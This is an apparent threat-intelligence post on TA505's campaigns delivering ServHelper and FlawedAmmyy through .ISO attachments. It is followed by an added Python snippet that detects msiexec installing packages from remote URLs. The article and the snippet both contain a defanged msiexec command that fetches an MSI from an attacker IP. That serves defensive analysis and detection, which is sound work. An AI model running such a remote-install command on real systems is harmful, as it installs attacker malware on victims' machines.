TA505 At It Again: Variety is the Spice of ServHelper and FlawedAmmyy


By Hara Hiroaki, Jaromir Horejsi, and Loseway Lu (Threats Analysts)


TA505 continues to show that, as a cybercriminal group, it intends to wreak as much havoc as possible while maximizing potential profits. Given the group's active campaigns since our updates in June and July, we continued following its latest operations. Just like in previous operations, the group keeps making small changes for each campaign, such as targeting other countries or entities, or varying the combination of techniques used for deployment.


Despite the changes, TA505 continues to use either FlawedAmmyy RAT (remote access trojan) or ServHelper as payloads. However, over the last nine campaigns since our June report, they also started using .ISO image attachments as the point of entry, as well as a .NET downloader, a new style for macro delivery, a newer version of ServHelper, and a .DLL variant of FlawedAmmyy downloader. The group also started targeting new countries, such as Turkey, Serbia, Romania, Korea, Canada, the Czech Republic, and Hungary.


.ISO, enabled macros for entry dropping ServHelper or FlawedAmmyy


We noticed that the group became active again in the middle of July, targeting Turkish and Serbian banks with emails that had .ISO file attachments as a means of entry. While the method is not new, the change in file type may yield successful infections given the unusual malware delivery technique.


The .ISO image attached to these emails contains an .LNK file that uses the msiexec command line to execute an MSI file fetched from a URL such as hxxp://139[.]180[.]195[.]36/pm2.
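The msiexec-from-URL step described above, as an added detection example that is not part of the original post: a small Python check over constructed process-creation records (the parent image, image and command-line fields are assumed names) that flags msiexec installing a package from a remote URL, including the defanged hxxp:// form used in reports.

```python
import re

# Process-creation records constructed for this example (not from the original
# post). Each tuple is (parent_image, image, command_line).
SAMPLE_EVENTS = [
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\msiexec.exe",
     "msiexec /q /i hxxp://139[.]180[.]195[.]36/pm2"),          # remote MSI, quiet
    ("C:\\Windows\\System32\\services.exe", "C:\\Windows\\System32\\msiexec.exe",
     "msiexec.exe /V"),                                          # benign service start
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\msiexec.exe",
     "msiexec /i C:\\Users\\user\\Downloads\\tool.msi /qn"),     # local package
    ("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\cmd.exe",
     "cmd.exe /c start https://example.invalid"),                # not msiexec
]

# Accept both live "http(s)://" and defanged "hxxp(s)://" so the same rule runs
# over raw telemetry and over indicators copied from a report.
_URL_RE = re.compile(r"\bh(?:xx|tt)ps?://[^\s\"']+", re.IGNORECASE)
# /q, /qn, /qb: silent or basic UI install, the usual choice for unattended drops.
_QUIET_RE = re.compile(r"(?:^|\s)/q[nb]?(?:\s|$)", re.IGNORECASE)


def is_remote_msiexec(image: str, command_line: str) -> bool:
    """True when msiexec.exe is invoked with a URL as the package location."""
    if not image.lower().endswith("msiexec.exe"):
        return False
    return _URL_RE.search(command_line) is not None


def classify_events(events):
    """Return one dict per suspicious event (parent, url, quiet), in input order."""
    hits = []
    for parent, image, cmdline in events:
        if not is_remote_msiexec(image, cmdline):
            continue
        url = _URL_RE.search(cmdline).group(0)
        hits.append({
            "parent": parent,
            "url": url,
            "quiet": _QUIET_RE.search(cmdline) is not None,
        })
    return hits


if __name__ == "__main__":
    for hit in classify_events(SAMPLE_EVENTS):
        print(f"msiexec remote install: url={hit['url']} parent={hit['parent']} quiet={hit['quiet']}")
```

The parent image is kept in the output because an msiexec launched by explorer.exe (a user double-clicking the .LNK inside a mounted image) is a different risk picture from one started by a software-deployment service.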

